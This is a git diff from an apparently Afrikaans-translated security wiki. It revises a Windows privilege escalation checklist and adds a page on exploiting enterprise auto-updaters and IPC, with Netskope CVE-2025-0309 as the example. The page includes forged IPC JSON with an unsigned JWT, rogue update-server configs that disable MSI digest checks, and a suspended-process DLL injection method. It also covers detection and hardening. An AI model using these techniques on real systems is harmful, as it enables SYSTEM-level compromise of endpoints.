Translated ['src/windows-hardening/windows-local-privilege-escalation/RE

2025-10-10 18:36:50 +00:00 · 2025-09-03 14:53:30 +00:00 · 2025-09-03 14:53:30 +00:00 · 16816c5717
commit 16816c5717
parent 416c2d30c1
4 changed files with 533 additions and 400 deletions
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@ -236,6 +236,7 @@
 - [Authentication Credentials Uac And Efs](windows-hardening/authentication-credentials-uac-and-efs.md)
 - [Checklist - Local Windows Privilege Escalation](windows-hardening/checklist-windows-privilege-escalation.md)
 - [Windows Local Privilege Escalation](windows-hardening/windows-local-privilege-escalation/README.md)
+  - [Abusing Auto Updaters And Ipc](windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md)
  - [Arbitrary Kernel Rw Token Theft](windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md)
  - [Dll Hijacking](windows-hardening/windows-local-privilege-escalation/dll-hijacking.md)
  - [Abusing Tokens](windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md)
--- a/src/windows-hardening/checklist-windows-privilege-escalation.md
+++ b/src/windows-hardening/checklist-windows-privilege-escalation.md
@ -1,113 +1,114 @@
-# Kontrolelys - Plaaslike Windows Privilege Escalation
+# Kontrolelys - Local Windows Privilege Escalation

 {{#include ../banners/hacktricks-training.md}}

-### **Beste hulpmiddel om na Windows plaaslike privilege escalatie vektore te soek:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
+### **Beste hulpmiddel om Windows local privilege escalation vektore te soek:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)

-### [Stelselinligting](windows-local-privilege-escalation/index.html#system-info)
+### [System Info](windows-local-privilege-escalation/index.html#system-info)

- [ ] Verkry [**Stelselinligting**](windows-local-privilege-escalation/index.html#system-info)
- [ ] Soek na **kernel** [**exploits met behulp van skripte**](windows-local-privilege-escalation/index.html#version-exploits)
- [ ] Gebruik **Google om te soek** na kernel **exploits**
- [ ] Gebruik **searchsploit om te soek** na kernel **exploits**
- [ ] Interessante inligting in [**omgewing veranderlikes**](windows-local-privilege-escalation/index.html#environment)?
- [ ] Wagwoorde in [**PowerShell geskiedenis**](windows-local-privilege-escalation/index.html#powershell-history)?
- [ ] Interessante inligting in [**Internet instellings**](windows-local-privilege-escalation/index.html#internet-settings)?
- [ ] [**Skyfies**](windows-local-privilege-escalation/index.html#drives)?
+- [ ] Verkry [**System information**](windows-local-privilege-escalation/index.html#system-info)
+- [ ] Soek na **kernel** [**exploits using scripts**](windows-local-privilege-escalation/index.html#version-exploits)
+- [ ] Gebruik **Google to search** vir kernel **exploits**
+- [ ] Gebruik **searchsploit to search** vir kernel **exploits**
+- [ ] Interessante inligting in [**env vars**](windows-local-privilege-escalation/index.html#environment)?
+- [ ] Wagwoorde in [**PowerShell history**](windows-local-privilege-escalation/index.html#powershell-history)?
+- [ ] Interessante inligting in [**Internet settings**](windows-local-privilege-escalation/index.html#internet-settings)?
+- [ ] [**Drives**](windows-local-privilege-escalation/index.html#drives)?
 - [ ] [**WSUS exploit**](windows-local-privilege-escalation/index.html#wsus)?
+- [ ] [**Third-party agent auto-updaters / IPC abuse**](windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md)
 - [ ] [**AlwaysInstallElevated**](windows-local-privilege-escalation/index.html#alwaysinstallelevated)?

-### [Logging/AV enumerasie](windows-local-privilege-escalation/index.html#enumeration)
+### [Logging/AV enumeration](windows-local-privilege-escalation/index.html#enumeration)

- [ ] Kontroleer [**Auditing**](windows-local-privilege-escalation/index.html#audit-settings) en [**WEF**](windows-local-privilege-escalation/index.html#wef) instellings
+- [ ] Kontroleer [**Audit** ](windows-local-privilege-escalation/index.html#audit-settings) en [**WEF** ](windows-local-privilege-escalation/index.html#wef) instellings
 - [ ] Kontroleer [**LAPS**](windows-local-privilege-escalation/index.html#laps)
- [ ] Kontroleer of [**WDigest**](windows-local-privilege-escalation/index.html#wdigest) aktief is
- [ ] [**LSA Beskerming**](windows-local-privilege-escalation/index.html#lsa-protection)?
+- [ ] Kontroleer of [**WDigest** ](windows-local-privilege-escalation/index.html#wdigest) aktief is
+- [ ] [**LSA Protection**](windows-local-privilege-escalation/index.html#lsa-protection)?
 - [ ] [**Credentials Guard**](windows-local-privilege-escalation/index.html#credentials-guard)[?](windows-local-privilege-escalation/index.html#cached-credentials)
- [ ] [**Gekapte Kredensiale**](windows-local-privilege-escalation/index.html#cached-credentials)?
+- [ ] [**Cached Credentials**](windows-local-privilege-escalation/index.html#cached-credentials)?
 - [ ] Kontroleer of enige [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md)
- [ ] [**AppLocker Beleid**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/README.md#applocker-policy)?
+- [ ] [**AppLocker Policy**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/README.md#applocker-policy)?
 - [ ] [**UAC**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control/README.md)
- [ ] [**Gebruiker Privileges**](windows-local-privilege-escalation/index.html#users-and-groups)
- [ ] Kontroleer [**huidige** gebruiker **privileges**](windows-local-privilege-escalation/index.html#users-and-groups)
- [ ] Is jy [**lid van enige bevoorregte groep**](windows-local-privilege-escalation/index.html#privileged-groups)?
- [ ] Kontroleer of jy [enige van hierdie tokens geaktiveer het](windows-local-privilege-escalation/index.html#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
- [ ] [**Gebruikers Sessies**](windows-local-privilege-escalation/index.html#logged-users-sessions)?
- [ ] Kontroleer [**gebruikers se tuis**](windows-local-privilege-escalation/index.html#home-folders) (toegang?)
- [ ] Kontroleer [**Wagwoord Beleid**](windows-local-privilege-escalation/index.html#password-policy)
- [ ] Wat is [**binne die Klembord**](windows-local-privilege-escalation/index.html#get-the-content-of-the-clipboard)?
+- [ ] [**User Privileges**](windows-local-privilege-escalation/index.html#users-and-groups)
+- [ ] Kontroleer [**current** user **privileges**](windows-local-privilege-escalation/index.html#users-and-groups)
+- [ ] Is jy [**member of any privileged group**](windows-local-privilege-escalation/index.html#privileged-groups)?
+- [ ] Kontroleer of jy enige van hierdie tokens geaktiveer het: **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
+- [ ] [**Users Sessions**](windows-local-privilege-escalation/index.html#logged-users-sessions)?
+- [ ] Kontroleer [ **users homes**](windows-local-privilege-escalation/index.html#home-folders) (access?)
+- [ ] Kontroleer [**Password Policy**](windows-local-privilege-escalation/index.html#password-policy)
+- [ ] Wat is[ **inside the Clipboard**](windows-local-privilege-escalation/index.html#get-the-content-of-the-clipboard)?

-### [Netwerk](windows-local-privilege-escalation/index.html#network)
+### [Network](windows-local-privilege-escalation/index.html#network)

- [ ] Kontroleer **huidige** [**netwerk** **inligting**](windows-local-privilege-escalation/index.html#network)
- [ ] Kontroleer **verborgene plaaslike dienste** wat beperk is tot die buitekant
+- [ ] Kontroleer **huidige** [**network** **information**](windows-local-privilege-escalation/index.html#network)
+- [ ] Kontroleer **hidden local services** wat na die buitekant beperk is

-### [Huidige Prosesse](windows-local-privilege-escalation/index.html#running-processes)
+### [Running Processes](windows-local-privilege-escalation/index.html#running-processes)

- [ ] Prosesse binêre [**lêer en vouer toestemmings**](windows-local-privilege-escalation/index.html#file-and-folder-permissions)
- [ ] [**Geheue Wagwoord mynbou**](windows-local-privilege-escalation/index.html#memory-password-mining)
- [ ] [**Onveilige GUI toepassings**](windows-local-privilege-escalation/index.html#insecure-gui-apps)
- [ ] Steel kredensiale met **interessante prosesse** via `ProcDump.exe` ? (firefox, chrome, ens ...)
+- [ ] Kontroleer proses-binaries [**file and folders permissions**](windows-local-privilege-escalation/index.html#file-and-folder-permissions)
+- [ ] [**Memory Password mining**](windows-local-privilege-escalation/index.html#memory-password-mining)
+- [ ] [**Insecure GUI apps**](windows-local-privilege-escalation/index.html#insecure-gui-apps)
+- [ ] Steel credentials met **interesting processes** via `ProcDump.exe` ? (firefox, chrome, etc ...)

-### [Dienste](windows-local-privilege-escalation/index.html#services)
+### [Services](windows-local-privilege-escalation/index.html#services)

- [ ] [Kan jy **enige diens** **wysig**?](windows-local-privilege-escalation/index.html#permissions)
- [ ] [Kan jy **wysig** die **binêre** wat deur enige **diens** **uitgevoer** word?](windows-local-privilege-escalation/index.html#modify-service-binary-path)
- [ ] [Kan jy **wysig** die **register** van enige **diens**?](windows-local-privilege-escalation/index.html#services-registry-modify-permissions)
- [ ] [Kan jy voordeel trek uit enige **ongekwote diens** binêre **pad**?](windows-local-privilege-escalation/index.html#unquoted-service-paths)
+- [ ] [Can you **modify any service**?](windows-local-privilege-escalation/index.html#permissions)
+- [ ] [Can you **modify** the **binary** that is **executed** by any **service**?](windows-local-privilege-escalation/index.html#modify-service-binary-path)
+- [ ] [Can you **modify** the **registry** of any **service**?](windows-local-privilege-escalation/index.html#services-registry-modify-permissions)
+- [ ] [Can you take advantage of any **unquoted service** binary **path**?](windows-local-privilege-escalation/index.html#unquoted-service-paths)

-### [**Toepassings**](windows-local-privilege-escalation/index.html#applications)
+### [**Applications**](windows-local-privilege-escalation/index.html#applications)

- [ ] **Skryf** [**toestemmings op geïnstalleerde toepassings**](windows-local-privilege-escalation/index.html#write-permissions)
- [ ] [**Opstart Toepassings**](windows-local-privilege-escalation/index.html#run-at-startup)
+- [ ] **Skryf** [**permissions on installed applications**](windows-local-privilege-escalation/index.html#write-permissions)
+- [ ] [**Startup Applications**](windows-local-privilege-escalation/index.html#run-at-startup)
 - [ ] **Kwetsbare** [**Drivers**](windows-local-privilege-escalation/index.html#drivers)

 ### [DLL Hijacking](windows-local-privilege-escalation/index.html#path-dll-hijacking)

- [ ] Kan jy **skryf in enige vouer binne PATH**?
- [ ] Is daar enige bekende diens binêre wat **probeer om enige nie-bestaande DLL** te laai?
- [ ] Kan jy **skryf** in enige **binêre vouer**?
+- [ ] Kan jy **write in any folder inside PATH**?
+- [ ] Is daar enige bekende service binary wat **tries to load any non-existant DLL**?
+- [ ] Kan jy **Skryf** in enige **binaries folder**?

-### [Netwerk](windows-local-privilege-escalation/index.html#network)
+### [Network](windows-local-privilege-escalation/index.html#network)

- [ ] Enumereer die netwerk (deel, interfaces, roetes, bure, ...)
- [ ] Neem 'n spesiale kyk na netwerkdienste wat op localhost (127.0.0.1) luister
+- [ ] Enumereer die netwerk (shares, interfaces, routes, neighbours, ...)
+- [ ] Gee besondere aandag aan netwerkdienste wat op localhost (127.0.0.1) luister

-### [Windows Kredensiale](windows-local-privilege-escalation/index.html#windows-credentials)
+### [Windows Credentials](windows-local-privilege-escalation/index.html#windows-credentials)

- [ ] [**Winlogon**](windows-local-privilege-escalation/index.html#winlogon-credentials) kredensiale
- [ ] [**Windows Vault**](windows-local-privilege-escalation/index.html#credentials-manager-windows-vault) kredensiale wat jy kan gebruik?
- [ ] Interessante [**DPAPI kredensiale**](windows-local-privilege-escalation/index.html#dpapi)?
- [ ] Wagwoorde van gestoor [**Wifi netwerke**](windows-local-privilege-escalation/index.html#wifi)?
- [ ] Interessante inligting in [**gestoor RDP Verbindinge**](windows-local-privilege-escalation/index.html#saved-rdp-connections)?
- [ ] Wagwoorde in [**onlangs uitgevoerde opdragte**](windows-local-privilege-escalation/index.html#recently-run-commands)?
- [ ] [**Afgeleë Desktop Kredensiale Bestuurder**](windows-local-privilege-escalation/index.html#remote-desktop-credential-manager) wagwoorde?
- [ ] [**AppCmd.exe** bestaan](windows-local-privilege-escalation/index.html#appcmd-exe)? Kredensiale?
- [ ] [**SCClient.exe**](windows-local-privilege-escalation/index.html#scclient-sccm)? DLL Syde Laai?
+- [ ] [**Winlogon** ](windows-local-privilege-escalation/index.html#winlogon-credentials)credentials
+- [ ] [**Windows Vault**](windows-local-privilege-escalation/index.html#credentials-manager-windows-vault) credentials wat jy kan gebruik?
+- [ ] Interessante [**DPAPI credentials**](windows-local-privilege-escalation/index.html#dpapi)?
+- [ ] Wagwoorde van gestoorde [**Wifi networks**](windows-local-privilege-escalation/index.html#wifi)?
+- [ ] Interessante inligting in [**saved RDP Connections**](windows-local-privilege-escalation/index.html#saved-rdp-connections)?
+- [ ] Wagwoorde in [**recently run commands**](windows-local-privilege-escalation/index.html#recently-run-commands)?
+- [ ] [**Remote Desktop Credentials Manager**](windows-local-privilege-escalation/index.html#remote-desktop-credential-manager) wagwoorde?
+- [ ] [**AppCmd.exe** exists](windows-local-privilege-escalation/index.html#appcmd-exe)? Wagwoorde?
+- [ ] [**SCClient.exe**](windows-local-privilege-escalation/index.html#scclient-sccm)? DLL Side Loading?

-### [Lêers en Register (Kredensiale)](windows-local-privilege-escalation/index.html#files-and-registry-credentials)
+### [Files and Registry (Credentials)](windows-local-privilege-escalation/index.html#files-and-registry-credentials)

- [ ] **Putty:** [**Kredensiale**](windows-local-privilege-escalation/index.html#putty-creds) **en** [**SSH gas sleutels**](windows-local-privilege-escalation/index.html#putty-ssh-host-keys)
- [ ] [**SSH sleutels in register**](windows-local-privilege-escalation/index.html#ssh-keys-in-registry)?
- [ ] Wagwoorde in [**onbewaakte lêers**](windows-local-privilege-escalation/index.html#unattended-files)?
- [ ] Enige [**SAM & SYSTEM**](windows-local-privilege-escalation/index.html#sam-and-system-backups) rugsteun?
- [ ] [**Cloud kredensiale**](windows-local-privilege-escalation/index.html#cloud-credentials)?
+- [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/index.html#putty-creds) **and** [**SSH host keys**](windows-local-privilege-escalation/index.html#putty-ssh-host-keys)
+- [ ] [**SSH keys in registry**](windows-local-privilege-escalation/index.html#ssh-keys-in-registry)?
+- [ ] Wagwoorde in [**unattended files**](windows-local-privilege-escalation/index.html#unattended-files)?
+- [ ] Enige [**SAM & SYSTEM**](windows-local-privilege-escalation/index.html#sam-and-system-backups) backup?
+- [ ] [**Cloud credentials**](windows-local-privilege-escalation/index.html#cloud-credentials)?
 - [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/index.html#mcafee-sitelist.xml) lêer?
- [ ] [**Gekapte GPP Wagwoord**](windows-local-privilege-escalation/index.html#cached-gpp-pasword)?
- [ ] Wagwoord in [**IIS Web konfigurasie lêer**](windows-local-privilege-escalation/index.html#iis-web-config)?
+- [ ] [**Cached GPP Password**](windows-local-privilege-escalation/index.html#cached-gpp-pasword)?
+- [ ] Wagwoord in [**IIS Web config file**](windows-local-privilege-escalation/index.html#iis-web-config)?
 - [ ] Interessante inligting in [**web** **logs**](windows-local-privilege-escalation/index.html#logs)?
- [ ] Wil jy [**kredensiale vra**](windows-local-privilege-escalation/index.html#ask-for-credentials) aan die gebruiker?
- [ ] Interessante [**lêers binne die Herwinde Mandjie**](windows-local-privilege-escalation/index.html#credentials-in-the-recyclebin)?
- [ ] Ander [**register wat kredensiale bevat**](windows-local-privilege-escalation/index.html#inside-the-registry)?
- [ ] Binne [**Bladsy data**](windows-local-privilege-escalation/index.html#browsers-history) (dbs, geskiedenis, boekmerke, ...)?
- [ ] [**Generiese wagwoord soektog**](windows-local-privilege-escalation/index.html#generic-password-search-in-files-and-registry) in lêers en register
- [ ] [**Hulpmiddels**](windows-local-privilege-escalation/index.html#tools-that-search-for-passwords) om outomaties vir wagwoorde te soek
+- [ ] Wil jy [**ask for credentials**](windows-local-privilege-escalation/index.html#ask-for-credentials) aan die gebruiker?
+- [ ] Interessante [**files inside the Recycle Bin**](windows-local-privilege-escalation/index.html#credentials-in-the-recyclebin)?
+- [ ] Ander [**registry containing credentials**](windows-local-privilege-escalation/index.html#inside-the-registry)?
+- [ ] Binne [**Browser data**](windows-local-privilege-escalation/index.html#browsers-history) (dbs, history, bookmarks, ...)?
+- [ ] [**Generic password search**](windows-local-privilege-escalation/index.html#generic-password-search-in-files-and-registry) in lêers en register
+- [ ] [**Tools**](windows-local-privilege-escalation/index.html#tools-that-search-for-passwords) om outomaties vir wagwoorde te soek

-### [Gelekte Hanteerders](windows-local-privilege-escalation/index.html#leaked-handlers)
+### [Leaked Handlers](windows-local-privilege-escalation/index.html#leaked-handlers)

- [ ] Het jy toegang tot enige hanteerder van 'n proses wat deur die administrateur uitgevoer word?
+- [ ] Het jy toegang tot enige handler van 'n proses wat deur administrator uitgevoer word?

-### [Pyp Kliënt Impersonasie](windows-local-privilege-escalation/index.html#named-pipe-client-impersonation)
+### [Pipe Client Impersonation](windows-local-privilege-escalation/index.html#named-pipe-client-impersonation)

 - [ ] Kontroleer of jy dit kan misbruik

--- a/src/windows-hardening/windows-local-privilege-escalation/README.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/README.md
--- a/src/windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md
@ -0,0 +1,123 @@
+# Misbruik van Enterprise Auto-Updaters en Geprivilegieerde IPC (bv., Netskope stAgentSvc)
+
+{{#include ../../banners/hacktricks-training.md}}
+
+Hierdie bladsy veralgemeen ’n klas Windows lokale privilege‑escalation kettings wat gevind word in enterprise endpoint agents en updaters wat ’n laag‑friksie IPC‑oppervlak en ’n geprivilegieerde update‑vloei blootstel. ’n Reprensentatiewe voorbeeld is Netskope Client for Windows < R129 (CVE-2025-0309), waar ’n laag‑geprivilegieerde gebruiker inskrywing na ’n aanvaller‑beheerde bediener kan afdwing en daarna ’n kwaadaardige MSI kan lewer wat die SYSTEM‑diens installeer.
+
+Belangrike idees wat jy teen soortgelyke produkte kan hergebruik:
+- Misbruik ’n geprivilegieerde diens se localhost IPC om her‑inskrywing of herkonfigurering na ’n aanvaller‑bediener af te dwing.
+- Implementeer die vendor se update‑endpoints, lewer ’n rogue Trusted Root CA, en punt die updater na ’n kwaadwillige, “signed” pakket.
+- Ontduik swak signer checks (CN allow‑lists), opsionele digest‑vlae, en laks MSI‑eienskappe.
+- As IPC “encrypted” is, lei die key/IV af vanaf wêreld‑leesbare masjien‑identifiseerders wat in die registry gestoor is.
+- As die diens oproepers beperk volgens image path/process name, inject in ’n allow‑listed proses of spawn een geskors en bootstrap jou DLL via ’n minimale thread‑context patch.
+
+---
+## 1) Forceer inskrywing na ’n aanvaller‑bediener via localhost IPC
+
+Baie agents lewer ’n user‑mode UI‑proses wat met ’n SYSTEM‑diens oor localhost TCP kommunikeer met JSON.
+
+Waargeneem in Netskope:
+- UI: stAgentUI (low integrity) ↔ Service: stAgentSvc (SYSTEM)
+- IPC command ID 148: IDP_USER_PROVISIONING_WITH_TOKEN
+
+Uitbuitingsvloei:
+1) Skryf ’n JWT enrollment token waarvan die claims die backend‑host beheer (bv., AddonUrl). Gebruik alg=None sodat geen signature vereis word nie.
+2) Stuur die IPC‑boodskap wat die provisioning‑opdrag aanroep met jou JWT en tenant‑naam:
+```json
+{
+"148": {
+"idpTokenValue": "<JWT with AddonUrl=attacker-host; header alg=None>",
+"tenantName": "TestOrg"
+}
+}
+```
+3) Die diens begin jou rogue server vir enrollment/config te kontak, bv.:
+- /v1/externalhost?service=enrollment
+- /config/user/getbrandingbyemail
+
+Aantekeninge:
+- If caller verification is path/name‑based, originate the request from a allow‑listed vendor binary (see §4).
+
+---
+## 2) Hijacking the update channel to run code as SYSTEM
+
+Sodra die client met jou bediener kommunikeer, implementeer die verwagte endpoints en lei dit na 'n attacker MSI. Tipiese volgorde:
+
+1) /v2/config/org/clientconfig → Gee JSON-config terug met 'n baie kort updater-interval, bv.:
+```json
+{
+"clientUpdate": { "updateIntervalInMin": 1 },
+"check_msi_digest": false
+}
+```
+2) /config/ca/cert → Gee 'n PEM CA sertifikaat terug. Die diens installeer dit in die Local Machine Trusted Root store.  
+3) /v2/checkupdate → Verskaf metadata wat na 'n kwaadwillige MSI en 'n valse weergawe wys.
+
+Bypass van algemene kontroles wat in die veld aangetref word:
+- Signer CN allow‑list: die diens mag slegs die Subject CN nagaan of dit gelyk is aan “netSkope Inc” of “Netskope, Inc.”. Jou eensindige CA kan 'n leaf-sertifikaat met daardie CN uitreik en die MSI teken.
+- CERT_DIGEST-eienskap: sluit 'n onskadelike MSI-eienskap met die naam CERT_DIGEST in. Geen afdwinging tydens installasie nie.
+- Opsionele digest-afdwinging: config-vlag (bv., check_msi_digest=false) skakel ekstra kryptografiese validering af.
+
+Resultaat: die SYSTEM-diens installeer jou MSI vanaf
+C:\ProgramData\Netskope\stAgent\data\*.msi
+en voer ewekansige kode uit as NT AUTHORITY\SYSTEM.
+
+---
+## 3) Forging encrypted IPC requests (when present)
+
+Vanaf R127 het Netskope IPC JSON in 'n encryptData-veld toegedraai wat soos Base64 lyk. Reversing het gewys op AES met key/IV afgelei van registerwaardes wat deur enige gebruiker gelees kan word:
+- Key = HKLM\SOFTWARE\NetSkope\Provisioning\nsdeviceidnew
+- IV  = HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductID
+
+Aanvallers kan die enkripsie reproduseer en geldige, geënkripteerde opdragte vanaf 'n standaardgebruiker stuur. Algemene wenk: as 'n agent skielik sy IPC "enkripteer", kyk vir device IDs, product GUIDs, install IDs onder HKLM as materiaal.
+
+---
+## 4) Bypassing IPC caller allow‑lists (path/name checks)
+
+Sommige dienste probeer die peer autentiseer deur die TCP-verbinding se PID op te los en die image path/name te vergelyk met 'n allow‑list van vendor-binaries onder Program Files (bv. stagentui.exe, bwansvc.exe, epdlp.exe).
+
+Twee praktiese omseilings:
+- DLL-injektie in 'n toegelate proses (bv. nsdiag.exe) en proxy IPC van binne dit.
+- Spawn 'n toegelate binêre gesuspendeer en bootstrap jou proxy DLL sonder CreateRemoteThread (sien §5) om bestuurder-afgedwingde manipulasie-reëls te bevredig.
+
+---
+## 5) Tamper‑protection friendly injection: suspended process + NtContinue patch
+
+Produkte bevat dikwels 'n minifilter/OB callbacks driver (bv. Stadrv) wat gevaarlike regte van handvatsels na beskermde prosesse verwyder:
+- Process: verwyder PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_READ, PROCESS_DUP_HANDLE, PROCESS_SUSPEND_RESUME
+- Thread: beperk tot THREAD_GET_CONTEXT, THREAD_QUERY_LIMITED_INFORMATION, THREAD_RESUME, SYNCHRONIZE
+
+'n Betroubare user‑mode loader wat hierdie beperkings respekteer:
+1) CreateProcess van 'n vendor-binary met CREATE_SUSPENDED.
+2) Verkry handvatsels wat jy nog toegelaat is: PROCESS_VM_WRITE | PROCESS_VM_OPERATION op die proses, en 'n thread-handle met THREAD_GET_CONTEXT/THREAD_SET_CONTEXT (of net THREAD_RESUME as jy kode by 'n bekende RIP patch).
+3) Oorskryf ntdll!NtContinue (of 'n ander vroeë, gewaarborgde-gelaaide thunk) met 'n klein stub wat LoadLibraryW op jou DLL-pad aanroep, en dan terug spring.
+4) ResumeThread om jou stub in‑proses te trigger en jou DLL te laai.
+
+Omdat jy nooit PROCESS_CREATE_THREAD of PROCESS_SUSPEND_RESUME op 'n reeds-beskermde proses gebruik het nie (jy het dit geskep), word die bestuurder se beleid bevredig.
+
+---
+## 6) Practical tooling
+- NachoVPN (Netskope plugin) outomatiseer 'n rogue CA, kwaadwillige MSI-ondertekening, en bedien die nodige endpoints: /v2/config/org/clientconfig, /config/ca/cert, /v2/checkupdate.
+- UpSkope is 'n custom IPC client wat arbitraire (opsioneel AES‑geënkripteerde) IPC-boodskappe skep en die gesuspendeerde‑proses injeksie insluit om van 'n allow‑listed binary te originate.
+
+---
+## 7) Detection opportunities (blue team)
+- Monitor toevoegings aan Local Machine Trusted Root. Sysmon + registry‑mod eventing (sien SpecterOps guidance) werk goed.
+- Merk MSI-uitvoerings wat deur die agent se diens geïnisieer word vanaf paaie soos C:\ProgramData\<vendor>\<agent>\data\*.msi.
+- Hersien agentlogs vir onverwante enrollment hosts/tenants, bv.: C:\ProgramData\netskope\stagent\logs\nsdebuglog.log – kyk vir addonUrl / tenant anomalieë en provisioning msg 148.
+- Waarschuw vir localhost IPC-kliente wat nie die verwagte signed binaries is nie, of wat uit vreemde child process-boom gewortel is.
+
+---
+## Hardening tips for vendors
+- Bind enrollment/update hosts aan 'n streng allow‑list; verwerp onbetroubare domeine in clientkode.
+- Authenticate IPC peers met OS-primitive (ALPC security, named‑pipe SIDs) in plaas van image path/name kontroles.
+- Hou geheime materiaal uit wêreld-leesbare HKLM; as IPC geënkripteer moet wees, lei sleutels af van beskermde geheime of onderhandel oor geauthentiseerde kanale.
+- Behandel die updater as 'n supply‑chain surface: vereis 'n volle ketting na 'n vertroude CA wat jy beheer, verifieer pakkethandtekenings teen gepinde sleutels, en fail closed as validering in die config gedeaktiveer is.
+
+## References
+- [Advisory – Netskope Client for Windows – Local Privilege Escalation via Rogue Server (CVE-2025-0309)](https://blog.amberwolf.com/blog/2025/august/advisory---netskope-client-for-windows---local-privilege-escalation-via-rogue-server/)
+- [NachoVPN – Netskope plugin](https://github.com/AmberWolfCyber/NachoVPN)
+- [UpSkope – Netskope IPC client/exploit](https://github.com/AmberWolfCyber/UpSkope)
+- [NVD – CVE-2025-0309](https://nvd.nist.gov/vuln/detail/CVE-2025-0309)
+
+{{#include ../../banners/hacktricks-training.md}}